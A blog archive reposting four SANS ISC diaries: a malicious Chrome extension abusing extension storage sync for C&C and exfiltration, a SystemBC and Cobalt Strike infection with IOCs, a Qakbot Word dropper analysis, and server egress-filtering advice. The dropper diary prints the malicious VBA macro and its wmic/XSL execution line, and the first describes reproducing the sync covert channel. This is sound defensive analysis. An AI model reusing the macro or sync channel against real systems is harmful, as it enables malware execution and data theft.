Blog

Archive for February, 2021

Abusing Google Chrome extension syncing for data exfiltration and C&C, (Thu, Feb 4th)

I had a pleasure (or not) of working on another incident where, among other things, attackers were using a pretty novel way of exfiltrating data and using that channel for C&C communication. Some of the methods observed in analyzed code were pretty scary – from a defender’s point of view, as you will see further below in this diary.

The code that was acquired was only partially recovered, but enough to indicate powerful features that the attackers were (ab)using in Google Chrome, so let us dive into it.

Google Chrome extensions

The basis for this attack were malicious extensions that the attacker dropped on the compromised system. Now, malicious extensions are nothing new – there were a lot of analysis about such extensions and Google regularly removes dozens of them from Chrome Web Store, which is the place to go to in order to download extensions.

In this case, however, the attackers did not use Chrome Web Store but dropped the extension locally in a folder and loaded it directly from Chrome on a compromised workstation. This is actually a legitimate function in Chrome – you can access it by going to More Tools -> Extensions and enabling Developer mode, after which you can load any extensions locally, directly from a folder by clicking on “Load unpacked“:

The attackers created a malicious addon which pretended to be Forcepoint Endpoint Chrome Extension for Windows, as shown in the figure below. Of course, the extension had nothing to do with Forcepoint – the attackers just used the logo and the name:

When creating Chrome extensions, configuration of an extension is stored in a file named manifest.json, which defines what permissions the extension has and many other parameters. The manifest.json file that was used by this malicious extension is shown below, with some parts redacted:

There are many parameters that can be used here, but the most important ones are the following:

  • content_scripts defines JavaScript files which will be injected in web pages defined in the matches object (redacted from screenshot). This can be used by an attacker to add arbitrary code to target web pages (think about changing content and stealing data)
  • permissions defines permissions that the extension requires – in this example it is set to storage, to allow the extension to use the storage API
  • background defines JavaScript files that will run when extension is loaded. This is where the attacker had their exfiltration and C&C features embedded. Background files are extremely powerful and allow a script to receive a message (and send it) in background (as the name says)

The majority of further analysis was based on the background scripts so I will skip details which are not interesting for this particular case.

The background script used the jQuery library, so the extension contained a legitimate version of jQuery (hey, everyone wants their life easy). But there were also some things that I saw for the first time, which is why I think this particular exploitation is novel.

Before showing the code, I must explain the attack goal of this particular attacker – they wanted to manipulate data in an internal web application that the victim had access to. While they also wanted to extend their access, they actually limited activities on this workstation to those related to web applications, which explains why they dropped only the malicious Chrome extension, and not any other binaries. That being said, it also makes sense – almost everything is managed through a web application today, be it your internal CRM, document management system, access rights management system or something else (which is why I love teaching SEC542).

With that in mind, let’s take a look at a part of a background script that was dropped by the malicious Chrome extension. Even if you are not a JavaScript developer, the code should be relatively understandable (once we explain what specific methods are used for):

This is what the code does:

  • First, the attacker used the chrome.runtime.onConnectExternal.addListener method. This method is part of the chrome.runtime API that is provided by the Chrome browser to extensions.
    onConnectExternal.addListener method allows a developer to setup a listener which will be fired when a connection is made from another extension. Interesting, so this allows for communication between extensions.
  • Then the attacker calls the port.onMessage.addListener method. The Port object allows for two way communication, so our extensions can have a nice conversation. The rest sets up a listener which will be called when the other extension calls postMessage() – that’s how messages are sent between extensions.
  • After some debugging that was left there by the attacker (the console.log request), there is a switch that checks the value of parameter type in the received message (this is just an excerpt from a bigger switch case).
  • Now an interesting thing happens: if the value of the type parameter is “check_oauth_token_status”, the extension will verify if there is a key called “oauth_token” in Chrome’s storage. If it is there, it will send back (to the other extension) a message containing the value of the token with the status set to true, after which it will be deleted from Chrome’s storage.
  • If the value of the type parameter is “save_mailhighlight_token”, the extension will create a new key in Chrome’s storage called email, with the value of “highlight_token” assigned to it. This key will be saved in Chrome’s storage.

This is hopefully readable in the code, but wait the best thing is yet to come: since the extension is using chrome.storage.sync.get and chrome.storage.sync.save methods (instead of chrome.storage.local), all these values will be automatically synced to Google’s cloud by Chrome, under the context of the user logged in in Chrome. In order to set, read or delete these keys, all the attacker has to do is log in with the same account to Google, in another Chrome browser (and this can be a throwaway account), and they can communicate with the Chrome browser in the victim’s network by abusing Google’s infrastructure!

While there are some limitations on size of data and amount of requests, this is actually perfect for C&C commands (which are generally small), or for stealing small, but sensitive data – such as authentication tokens!

For me, this was the first time I have seen something like this, so I naturally wanted to test it to see how things are working – and you can do the same thing.

For testing you can use any extension you have, as long as it requested the storage permission. For this demo I will be using the Google Docs Offline extension, something a lot of users might have installed in their browser (and I do as well). Select developer mode and in the extension click on the background page link:

Now the DevTools console will open that will allow you to issue commands as this extension directly – normally an attacker would put code into files as described above, but for the test we will be executing commands directly. Go to the Console tab and now you can use the API’s directly. Let’s store and sync a test message over Google’s infrastructure:

This will create a key called “SANS” with the value of “Hello from Internet Storm Center” and will sync it to this account. The sync will not happen instantly, but in my tests it was synced usually in 10-15 seconds at the most. Now let me log in on my other machine, open the DevTools console same as above and read this key (notice this is done on a Mac):

Woot! It worked! So we can use this to “have a chat” between these two machines, over Google’s infrastructure. As you can imagine, this can be used as both a C&C communication channel, but also for slow exfiltration of data. It will be slow because Chrome and Google throttle requests. Specifically, a key can be up to 8 KB (8192) bytes in size, with a maximum number of keys being 512, allowing us to transfer 4 MB at a time. Besides this, Chrome will allow 2 set, remove or clear operations per second or 1800 operations per hour. Hmm, when I think about it, it’s not that slow really.

I was, of course, also interested into what this looks like on the wire and if it is possible to maybe detect such abuse of Chrome’s extensions.
All requests Chrome is making are directed to clients4.google.com, over HTTPS. The request syncing the key I set previously is shown below:

Now, if you are thinking on blocking access to clients4.google.com be careful – this is a very important web site for Chrome, which is also used to check if Chrome is connected to the Internet (among other things).

In the request shown in the figure above the body is GZIP compressed. It contains a serialized object which contains also the key that was set. In case you are intercepting your browser traffic on the edge (for example, with an interception proxy), this will make analysis (much) more difficult, but luckily the requests always appear to be going to the /chrome-sync/ endpoint, so this is something you can block or alert on.

Besides this, I would recommend that (depending on your environment) Chrome extensions are controlled; Google allows you to do that through group policies so you can define exactly which extensions are allowed/approved and block everything else.

Hope you enjoyed this little analysis of how scary web browser extensions can be!
 


Bojan
@bojanz
INFIGO IS

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Excel spreadsheets push SystemBC malware, (Wed, Feb 3rd)

Introduction

On Monday 2021-02-01, a fellow researcher posted an Excel spreadsheet to the Hatching Triage sandbox.  This Excel spreadsheet has a malicious macro, and it uses an updated GlobalSign template that I hadn’t noticed before (link for the sample).

This Excel spreadsheet pushed what might be SystemBC malware when I tested it in my lab environment on Monday 2021-02-01.  My lab host was part of an Active Directory (AD) environment, and I also saw Cobalt Strike as follow-up activity from this infection.

Today’s diary reviews this specific instance of (what I think is) SystemBC and Cobalt Strike activity from Monday 2021-02-01.


Shown above:  Flow chart from the SystemBC infection on Monday 2021-02-01.

Infection Path

I didn’t know where these spreadsheets were coming from when I investigated this activity on Monday 2021-02-01.  By Tuesday 2021-02-02, several samples had come into VirusTotal showing at least 20 spreadsheets that were contained in zip archives.  These appear to have been attachments using emails as a distribution method.  Unfortunately, I couldn’t find any emails submitted to VirusTotal yet that contained one of the zip archives.


Shown above:  Screenshot from one of the spreadsheets.

Spreadsheet macro grabs SystemBC malware

Enabling macros on a vulnerable Windows host caused HTTPS traffic to grab a Windows executable (EXE) file for SystemBC malware.  This EXE was stored and run from new directory path created under the C: drive as shown below.


Shown above: SystemBC malware saved to the infected Windows host.

This EXE file was made persistent on the infected host through a scheduled task.


Shown above:  Scheduled task to keep the malware persistent.

SystemBC post-infection traffic

The first post-infection traffic caused by SystemBC was TCP traffic to 109.234.39[.]169 over port 4001 as shown below.


Shown above:  SystemBC traffic over TCP port 4001.

Next was HTTP traffic to the same IP address over TCP port 80 that returned obfuscated text containing code to start the Cobalt Strike activity.


Shown above:  HTTP traffic caused by SystemBC that returned code for Cobalt Strike.

Cobalt Strike traffic

Cobalt strike activity consisted of HTTPS traffic and DNS activity focused on the domain fastonent[.]com.


Shown above:  Cobalt Strike activity from the infection.


Shown above:  Alerts from the traffic using Squil in Security Onion with Suricata and the ETPRO ruleset.

Indicators of Compromise (IOCs)

SHA256 HASHES OF 20 ZIP ARCHIVES WITH THE 20 EXCEL FILES THEY CONTAIN:

– 31a04fe64502bfe6f73971f9de9736402dd9a21a66d41d3a4ecea5ee18852f1c  documentation-82.zip
– a54b331832d61ae4e5a2ec32c46830df4aac4b26fe877956d2715bfb46b6cb97  Document21467.xls

– ce02ed48d9ab12dfe2202c16f1f272f75e5b1c0b64e48e385ca71608cb686fc8  documentation-17.zip
– 62f1ef07f7bab2ad9abf7aeb53e3a5632527a1839c3364fbaebadd78d6c18f4e  Document13160.xls

– 4dfb0bb69a07f1cd7b46198b5edf8afebd0cdd02f27eb2c687447f692625fb9f  contract-86.zip
– 59bbcecd3b1670afc5430e3b31377f24da24f4e755b7c563a842ce4e325aa61a  Document24071.xls

– c3a38df6f4864d32c10e8ecf063e18cba56c3b1add3404634ea20ea109198620  agreement-92.zip
– 8ef917da85afcc5f7bfe9cc2afd29f44a7f0cda5ba0249b50ef448d547007461  Document1525.xls

– 3a181036cdc46e088f1cb98acd06062d32a8a11a8ef65fe7544bb22a2fd5c56e  information-94.zip
– 387bdfedc306e087d8ceceb1f1f8f7a6b3c32110ca3d7273eb01e474349d1974  Document10668.xls

– 244625f6627cadadb7faf8a6b526e91aee4f5c1cadfa1c0d4fb996f4cc60a5ae  documentation-18.zip
– 17ed4dc4369a90d2e24f1ab0fa1eeb6fca61f77b183499c47e5cfb9ce12130fb  Document7833.xls

– cca4a3c8af9b549b445b7e2bcb2d45b95982890b6ed3b62fc882f0478f512b2f  agreement-44.zip
– f682f0756ec96d262ae4c48083d720657685d9b56278bd07b2656f3b33be985e  Document1047.xls

– dcff925d51e90586eb624f249e56b6abb7026b364fab84dcfcf44025e84ff7d9  DOCUMENT-30.zip
– 2e726c5a27e04633d407e13bd242ae71865eef13ac78bf9068e1200823e5ea81  Document15758.xls

– dc5a3675455d9486e7aa8aaf2463b69ad03c508375eb99b6fb3039d914677a9f  information-94.zip
– 6c0ef43c1f8b4425d034a46812903b8a6345ae24e556e61e37c0f14eba8c8d2e  Document15979.xls

– 7d1602138a26c0524b32570f3fb292fd5a7efbc5ed53ae260d7b7f3652a78969  documentation-83.zip
– b4107daacbbfac1b9bc9b3fa4e34a8d87037fa2c958db9d6d7df52380f15a1d1  Document16000.xls

– 0fb4d8ac3cdef038bf53c8f4269eef5845704a9e962b7609fd93a9f08cc2fab1  documentation-48.zip
– ff483bbb98d02d1e071d6f0e8f3a3c1706c246db71221455b29f4e54b0c4ef2f  Document29060.xls

– 0cf4fff7f96cf695d3476e7dc66794d067acafbd2980f69526b874fc5b4c08be  docs-62.zip
– 441f076519f0bdc04d110b4fa73dbafa3b667825ceab6d4099e36714bd1d7213  Document5804.xls

– 056911f208c9b475020627b83c8bf3a0151e30ec7f71113cf75abb950a431efc  answer-46.zip
– 795a5d5c57dac1703c6b4bab9507d1c662180716b4afa89c261aa3bb6d164e2f  Document10660.xls

– 31901336fdfae4fdeac46b937a059c618d5ba3e04d06bb8e95108a307e2c6d94  DOCUMENT-74.zip
– b2aa3ee1cc617f90e92664969a0856d98a97c727edd7c81ef83c038a34a432d5  Document4083.xls

– e06ee4e0bbe581edc39aecaab76e3fa12a53cb971ec0c106644703b376f5ed24  reaction-32.zip
– a3ce1043a7791b73fe14d7c29377467fd64df3b3b464c48a22a6d3bd2f7786aa  Document18681.xls

41 OTHER EXCEL FILES WITH THE SAME DOCUMENT TEMPLATE:

– 044494acb6d781e6cc3b9a837b7ebca1e933080fe384a874f5eb9cca1ea76a55  DOCUMENT-99.xls
– 071809d68b777cae171284c2cc289b455a778b1f054cd0f244cf0fb6053dae2d  documentation-47.xls
– 0e094197fca1947eb189006ddeb7d6ad9e5d1f58229e929bc0359887ed8a667d  agreement-84.xls
– 134a5bfe06f87ace41e0e2fb6f503dca0d521cb188a0c06c1c4bc734ad01e894  Document5201.xls
– 13ef189260cd344e61a0ad5907c5e695372b00fe1f5d5b2b3e389ad2b99b85e4  documentation-32.xls
– 17fb4271ab9113a155c091c7d7bd590610da87e986ccf5962aa7fc4b82060574  SG_information-24.xls
– 19065d8aa76ba67d100d5cb429a8b147c61060cc49905529d982042a55caceef  agreement-26.xls
– 1b63ff13d507f9d88d03e96c3ef86c7531da58348f336bc00bf2d2a2e378fd90  documentation-63.xls
– 1d8fd79934dc9e71562e50c042f9fa78a93fa2991d98c33e0b6ab20c0b522d5a  required-47.xls
– 1e295b33d36dee63930728349be8d4c7b8e5b52f98e6a8d9ca50929c8a3c9fb1  contract-52.xls
– 2156a9f3d87d3df1cee3f815f609c2a3dc2757717ff60954683c34794e52b104  document-85.xls
– 21db2f562b9182a3fcdb0fce8c745b477be02b4a423a627cddf6a1c244b6c415  DOCUMENT-64.xls
– 2f66e8d84e87811feaf73e30b08be0ad6381271ddfb5071556bd26cd3db2c3f4  documents-74.xls
– 32452e930a813f41a24dc579a08e8dde1801603797d527ce1385ad414b00e676  Document9330.xls
– 32a904d301e8a30b7bd70804b905dd7b858b761979f3344bc2ec3bff0cb6d703  DOCUMENT-64.xls
– 3dcd7897ad927f4b2b860010963e02903bc68a2c0c86abb1a27b8cbaab2fa9b6  document-91.xls
– 418460bf69c01e47cbe261d7f7312475cda4305860fbbe3d3e6639b9adb78de5  Document8107.xls
– 49cb79f8547c9c94a7ab6642ba1c40fcd036625f71845f2c6203d76c5f7f46fb  documents-44.xls
– 4af6e8805273ca9b3dea793bd712ed785ea5c5ed9e387cb8ab5059a4f364a303  docs-49.xls
– 584c2aab3fe9e1ec9f9dffecbd32e6af8b6b3fa3141c7ddf845763cbf14a82eb  DOCUMENT-30.xls
– 5cecb7e104e73aa9916a7154a3004d1a71c59c8f473d693f3b285b2fd473e454  documentation-66.xls
– 669de92b909247d676daa6bab3b3ae5be4fbec2e77f66915267f032c1d7eb71a  agreement-50.xls
– 6bf9612a2b8288d55b47648f9ad9ee80cca5058ced5fb77254e57f9ff2d701d3  contract-38.xls
– 6df34ffeffb9cc5def3c424cd8bb0f90ab921be24efd1f8fe52ea6c13e700334  data-65.xls
– 8072f20dd769519a621255307b03e85dca2fe227f48486b0aacc41903ab3bfdf  Document12611.xls
– 8eb429c24872a501fafc783e8a0fcc53e0ebb5cc8ec4f2310fc10102b1d23a27  contract-90.xls
– 908cb8f6f39b9c310d8df54bddf667d23b0851bbf90b21ca89ea69d211f2c402  Document21461.xls
– 9519a0631804d18f95d4c3239df5e5ea56b8e5a890b73c889a58d6469958eb71  Document11622.xls
– 952ec18a6dc949ebd335f5eabed756d0f562aa3853fe9384dc0eded0de5f843b  required-36.xls
– a274a08d84958666b6c94e1a6fc3b676aca387544a4218c8473e1a9a72124532  documentation-45.xls
– a7b362864724ccb5cba416ff45b4e137f22f8fed4492b5521e369026107031b2  Document9470.xls
– ab9b97d0d17b2434d2cfc66106ae07b903271ba603be1314b742338c23cce20c  docs-72.xls
– c4d745576b47b6dd79a9d92cda7dbe60c2cda7d8960a07e33692e6e71f8e5eb3  document-78.xls
– c8fd542a9b500ada7afbff26b6c11dd2ab22aaefd30ef7a999410ee20d2fb043  answer-69.xls
– d0c96aacb07629b9d97641a0022b50827f73d86a34fa4929b126f398cf4cf486  Document21265.xls
– d3145f4f7b1c62f9a1937aa9e968da8b52ff4fde83c0dba3152567b2b65d809a  documentation-49.xls
– d4e372014a40821f10780fcc12c6b5a1cdf4740738a0769e78f06dd10b6ec53f  daret.xls
– d85eb8e5c39d7681155e39602ce30e0c3793b4513f1038e48334296db945e02d  documentation-29.xls
– e26ab2d6cff95ba776ec6e7beb8c70f2e4d79467b71153ddb36177cb2b2a1273  Document4677.xls
– e64d605e857900a07c16e22e288c37355e4ebd6021898268ab5dded5c8c4efca  documentation-99.xls
– f5e2351ff528c574dc23c7ef48ddac42546c86d77c28333b25112a9efbfb9d93  Document18108.xls

AT LEAST 7 URLS GENERATED BY EXCEL MACROS FOR A MALWARE PAYLOAD:

– hxxps://alnujaifi-portal[.]com/ds/3101.gif
– hxxps://clinica-cristal[.]com/ds/3101.gif
– hxxps://eyeqoptical[.]ca/ds/3101.gif
– hxxps://gbhtrade.com[.]br/ds/3101.gif
– hxxps://newstimeurdu[.]com/ds/3101.gif
– hxxps://remacon[.]net/ds/3101.gif
– hxxps://skconstruction[.]info/ds/3101.gif

MALWARE PAYLOAD EXAMPLE (SYSTEMBC EXE):

– SHA256 hash: 61499704920ee633ffb2baab36eb8eb70d5e0426bca584f9a4a872e4b930c417
– File size: 243,200 bytes
– File location: C:BlockStUptqeodkwineditor.exe

SYSTEMBC TRAFFIC:

– 109.234.39.169 over TCP port 4001 – encoded/encrypted data
– 109.234.39.159 over TCP port 80 – GET /systembc/[24 ASCII characters representing hex string].txt

COBALT STRIKE ACTIVITY:

– 192.169.6.8 over TCP port 443 – no domain – HTTPS traffic
– 192.169.6.8 over TCP port 443 – fastonent[.]com – HTTPS traffic
– 192.169.6.8 over TCP port 8080 – fastonent[.]com – HTTPS traffic
– DNS queries/responses for various domains ending with .dns.fastonent[.]com

Final words

I’m not 100 percent sure this malware is SystemBC, but HTTP traffic caused by the EXE has /systembc/ in the URL, so I’m calling it SystemBC until someone identifies it as another malware family.

When I ran the spreadsheet on a stand-alone host, I only saw SystemBC traffic over TCP port 4001.  I didn’t see the Cobalt Strike traffic until I infected one of my lab hosts within an AD environment.  This reflects a trend I’ve noticed with at least one another malware family (Hancitor), where Cobalt Strike doesn’t appear unless the infected host is running in an AD environment.

A pcap of the infection traffic and and malware from the infected Windows host can be found here.


Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

New Example of XSL Script Processing aka "Mitre T1220", (Tue, Feb 2nd)

Last week, Brad posted a diary about TA551[1]. A few days later, one of our readers submitted another sample belonging to the same campaign. Brad had a look at the traffic so I decided to have a look at the macro, not because the code is heavily obfuscated but data are spread at different locations in the Word document.

The sample was delivered through a classic phishing email with a password-protected archive. It’s a file called ‘facts_01.28.2021.doc’ (SHA256:dcc5eb5dac75a421724fd8b3fa397319b21d09e22bc97cee1f851ef73c9e3354) and unknown on VT at this time.

It contains indeed a macro:

[email protected]:/MalwareZoo/20210129$ oledump.py facts_01.28.2021.doc
A: word/vbaProject.bin
 A1:       539 'PROJECT'
 A2:        89 'PROJECTwm'
 A3: m    1127 'VBA/ThisDocument'
 A4:      3687 'VBA/_VBA_PROJECT'
 A5:      2146 'VBA/__SRP_0'
 A6:       198 'VBA/__SRP_1'
 A7:       348 'VBA/__SRP_2'
 A8:       106 'VBA/__SRP_3'
 A9: M    1165 'VBA/a7JUT'
A10: M   10838 'VBA/aBJwC'
A11:       884 'VBA/dir'
A12: m    1174 'VBA/frm'
A13:        97 'frm/x01CompObj'
A14:       286 'frm/x03VBFrame'
A15:       170 'frm/f'
A16:      1580 'frm/o'

If looking at “M” flags in the oledump output is a key point, it’s always good to have a look at all the streams. A first interesting observation is the presence of a user form in the document (see the ‘frm’ in streams 13 to 16 combined with ‘m’ in stream 12). ‘frm’ is the name that was given to the author. This can be verified by checking the document in a sandbox:

WARNING: Don’t do this on a regular host!

The user form contains three elements (text boxes). Now let’s have a look at the document. Macros are polluted with comments and can be cleaned by filtering them.

Stream #9 is not interesting, it just contains the AutoOpen() function which calls the real entry point:

[email protected]:/MalwareZoo/20210129$ oledump.py facts_01.28.2021.doc -s 9 -v | grep -v "' "
Attribute VB_Name = "a7JUT"
Sub AutoOpen()
Call ahjAvX
End Sub

The real interesting one is located in the stream 10:

[email protected]:/MalwareZoo/20210129$ oledump.py facts_01.28.2021.doc -s 10 -v | grep -v "' "
Attribute VB_Name = "aBJwC"
Function ajC1ui(auTqHQ)
End Function
Function atZhQ(aF1TxD)
atZhQ = ActiveDocument.BuiltInDocumentProperties(aF1TxD)
End Function
Function ayaXI(aa5xD, aqk4PA)
Dim aoTA6S As String
aoTA6S = Chr(33 + 1)
ayaXI = aa5xD & atZhQ("comments") & aoTA6S & aqk4PA & aoTA6S
End Function
Function acf8Y()
acf8Y = "L"
End Function
Sub ahjAvX()
axfO6 = Trim(frm.textbox1.text)
aa6tSY = Trim(frm.textbox2.text)
aqk4PA = aa6tSY & "xs" & acf8Y
aa5xD = aa6tSY & "com"
a6AyZu = Trim(frm.textbox3.text)
aYlC14 aqk4PA, axfO6
FileCopy a6AyZu, aa5xD
CreateObject("wscript.shell").exec ayaXI(aa5xD, aqk4PA)
End Sub
Sub aYlC14(aFp297, axfO6)
Open aFp297 For Output As #1
Print #1, axfO6
Close #1
End Sub

ahjAvX() is called from AutoOpen() and starts by extracting values of the user form elements: form.textbox[1-3].text

The element #3 contains “c:windowssystem32wbemwmic.exe”
Element #2 contains “c:programdatahello.” (note the dot at the end)
And element #1 contains what looks to be some XML code.

Before check the XML code, let’s deobfuscate the macro:

ahjAvX() reconstructs some strings and dump the XML payload into a XSL file by calling aYlC14(). Then, a copy of wmic.exe (the WMI client) is copied in “c:programdatahello.com”. Before spawning a shell, more data is extracted from the document via atZhQ():

Function atZhQ(aF1TxD)
atZhQ = ActiveDocument.BuiltInDocumentProperties(aF1TxD)
End Function

The document comments field contains the string “pagefile get /format:”

By the way, did you see the author’s name?

With the extracted comments field, here is the function that executes the XSL file:

Function ayaXI(aa5xD, aqk4PA)
  Dim aoTA6S As String
  aoTA6S = Chr(33 + 1)
  ayaXI = aa5xD & atZhQ("comments") & aoTA6S & aqk4PA & aoTA6S
End Function

The reconstructed command line is:

c:programdatahello.com pagefile get /format: "c:programdatahello.xsl"

We have here a perfect example of a dropper that dumps an XSL file on the disk and executes it. This technique is referred as T1220 by Mitre[2]. Let’s now have a look at the XSL file:
















The function awyXdU() is the entry point of this XSL file. It calls aOLsw() to download the malicious Qakbot DLL, dumps it on the disk, and executes it with regsvr32. XSL files are not new but it has been a while since I did not spot one. Didier already mentioned them in a previous diary around 2019[3].

[1] https://isc.sans.edu/forums/diary/TA551+Shathak+Word+docs+push+Qakbot+Qbot/27030/
[2] https://attack.mitre.org/techniques/T1220/
[3] https://isc.sans.edu/forums/diary/Malicious+XSL+Files/25098

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Taking a Shot at Reverse Shell Attacks, CNC Phone Home and Data Exfil from Servers, (Mon, Feb 1st)

Over the last number of weeks (after the Solarwinds Orion news) there’s been a lot of discussion on how to detect if a server-based applcation is compromised.  The discussions have ranged from buying new sophisticated tools, auditing the development pipeline, to diffing patches.  But really, for me it’s as simple as saying “should my application server really be able to connect to any internet host on any protocol”.  Let’s take it one step further and say “should my application server really be able to connect to arbitrary hosts on tcp/443 or udp/53 (or any other protocol)”.  And when you phrase it that way, the answer really should be a simple “no”.

For me, fixing this should have been a simple thing.  Let’s phrase this in the context of the CIS Critical Controls (https://www.cisecurity.org/controls/)
CC1: server and workstation inventory
CC2: software inventory 
(we’ll add more later)

I know these first two are simple – but in your organization, do you have a list of software that’s running on each of your servers?  With the inbound listening ports?  How about outbound ports that connect to known internet hosts?
This list should be fairly simple to create, figure a few minutes to hour or so for each application to phrase it all in terms that you can make firewall rules from

CC12:
Now, for each server make an egress filter “paragraph” for your internet facing firewalls.  Give it permission to reach out to it’s list of known hosts and protocols.  It’s rare that you will have hosts that need to reach out to the entire internet – email servers on the SMTP ports are the only ones that immediately come to mind, and we’re seeing fewer and fewer of those on premise anymore these days.
Also CC12:
So now you have the list of what’s allowed for that server.  Add the line “permit any ip log” – in other words, permit everything else, but log it to syslog.  Monitor that server’s triggered logs for a defined period of time (a day or so is usually plenty).  Be sure to trigger any “update from the vendor” events that might be part of any installed products.  After that period of time, change that line to “deny any ip log”, so now we’re denying outbound packets from that server, but still logging them.

What about my Linux servers you ask?  Don’t they need all of github and every everything in order to update?  No, no they do not.  To get the list of repo’s that your server reaches out to for upgrades:

sudo apt-get update
Hit:1 http://us.archive.ubuntu.com/ubuntu focal InRelease
Hit:2 http://security.ubuntu.com/ubuntu focal-security InRelease
Hit:3 http://us.archive.ubuntu.com/ubuntu focal-updates InRelease
Hit:4 http://us.archive.ubuntu.com/ubuntu focal-backports InRelease
Reading package lists… Done

[email protected]:~$ cat /etc/apt/sources.list | grep -v “#” | grep deb
deb http://us.archive.ubuntu.com/ubuntu/ focal main restricted
deb http://us.archive.ubuntu.com/ubuntu/ focal-updates main restricted
deb http://us.archive.ubuntu.com/ubuntu/ focal universe
deb http://us.archive.ubuntu.com/ubuntu/ focal-updates universe
deb http://us.archive.ubuntu.com/ubuntu/ focal multiverse
deb http://us.archive.ubuntu.com/ubuntu/ focal-updates multiverse
deb http://us.archive.ubuntu.com/ubuntu/ focal-backports main restricted universe multiverse
deb http://security.ubuntu.com/ubuntu focal-security main restricted
deb http://security.ubuntu.com/ubuntu focal-security universe
deb http://security.ubuntu.com/ubuntu focal-security multiverse

(this lists all sources, filters out comment lines, and looking for “deb” nicely filters out blank lines)

Refine this list further to just get the unique destinations:

[email protected]:~$ cat /etc/apt/sources.list | grep -v “#” | grep deb | cut -d ” ” -f 2 | sort | uniq
http://security.ubuntu.com/ubuntu
http://us.archive.ubuntu.com/ubuntu/

So for a stock Ubuntu server, the answer is two – you need access to just two hosts to do a “direct from the internet” update. Your mileage may vary depending on your configuration though.

How about Windows?  For a standard application server, the answer usually is NONE.  You likely have an internal WSUS, SCCM or SCOM server right?  That takes care of updates.  Unless you are sending mail with that server (which can be limited to just tcp/25, and most firewalls will restrict to valid SMTP), likely your server is providing a service, not reaching out to anything.   Even if the server does reach out to arbitrary servers, you can likely restrict it to specific destination hosts, subnets, protocols or countries.

With a quick inventory, creating a quick “stanza” for each server’s outbound permissions goes pretty quickly.  For each line, you’ll be able to choose a logging action of “log”, “alert” or “don’t log”.  Think about these choices carefully, and select the “don’t log” option at your peril.  Your last line for each server’s outbound stanza should almost without fail be your firewall’s equivalent of “deny ip any log

Be sure that your server change control procedures include a “after this change, does the application or server need any additional (or fewer) internet accesses?”

The fallout from this?  Surprisingly little.  

  • If you have administrators who RDP to servers, then use the browser on that server for support purposes, this will no longer work for them.  THIS IS A GOOD THING.  Browse to potentially untrusted sites from your workstation, not the servers in the server VLAN!
  • As you add or remove software, there’s some firewall rule maintenance involved.  If you skip that step, then things will break when you implement them on the servers.  This “tie the firewall to the server functions” step is something we all should have been doing all along.
  • But I have servers in the cloud you say?  It’s even easier to control outbound access in any of the major clouds, either with native tools or by implementing your cloud based or virtual firewall.  If you haven’t been focused on firewall functions for your cloud instance, you should drop your existing projects and focus on that for a week or so (seriously, not joking).
  • On the plus side, you’ll have started down the path of implementing the Critical Controls.  Take a closer look at them if you haven’t already, there’s only good things to find there 🙂
  • Also on the plus side, you’ll know which IP’s, subnets and domains that your purchased applications reach out to
  • Just as important, or even moreso – you’ll have that same information for your in-house applications.
  • Lastly, if any of your hosts or applications reach out to a new IP, it’s going to blocked and will raise an alert.  If it ends up being reverse-shell or C&C traffic, you can definitively say that you blocked that traffic.  (score!)
  • Lastly-lastly – treat denied server packets as security incidents.  Make 100% sure that denying this packet breaks something before allowing it.  If you just add an “allow” rule for all denied packets, then you’ll at some point just be enabling malware to do it’s best.

For most organizations with less than a hundred server VMs, you can turn this into a “hour or two per day” project and get it done in a month or so.

Will this catch everything?  No you still need to address workstation egress, but that’s a do-able thing too (https://isc.sans.edu/forums/diary/Egress+Filtering+What+do+we+have+a+bird+problem/18379/).  Would this have caught the Solarwinds Orion code in your environment?  Yes, parts of it – in most shops the Orion server does not need internet access at all (if you don’t depend on the application’s auto-update process) – even with that, it’s a short “allow” list.  And if the reaction is to treat denied packets seriously, you’d have caught it well before it hit the news (this was a **lengthy** incident).  The fact that nobody caught it in all that time really means that we’re still treating outbound traffic with some dangerous mindsets “we trust our users” (to not make mistakes), “we trust our applications” (to not have malware) and “we trust our server admins” (to not do dumb stuff like browse from a server, or check their email while on a server).  If you read these with the text in the brackets, I’m hoping you see that this really should be mindsets we set aside, maybe we should have done this in the early 2000’s!  This may seem like an over-simplification, but really it’s not – this approach really does work.

If you’ve caught anything good with a basic egress filter, please share using our comment form (NDA permitting of course).

Referenced Critical Controls:

CC1: Inventory and Control of Hardware Assets (all of it, if you haven’t done this start with your server VLAN)
CC2: Inventory and Control of Software Assets (again, all of it, and again, start with your server VLAN for this)
CC7.6 Log all URL requests from each of the organization’s systems, whether on-site or a mobile device, in order to identify potentially malicious activity and assist incident handlers with identifying potentially compromised systems.9.1 Associate active ports, services, and protocols to the hardware assets in the asset inventory.
CC9.4 Apply host-based firewalls or port-filtering tools on end systems, with a default-deny rule that drops all traffic except those services and ports that are explicitly allowed.
CC12.4 Deny communication over unauthorized TCP or UDP ports or application traffic to ensure that only authorized protocols are allowed to cross the network boundary in or out of the network at each of the organization’s network boundaries.
CC12.5 Configure monitoring systems to record network packets passing through the boundary at each of the organization’s network boundaries.

 

===============
Rob VandenBrink
[email protected]

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →
Page 5 of 5 12345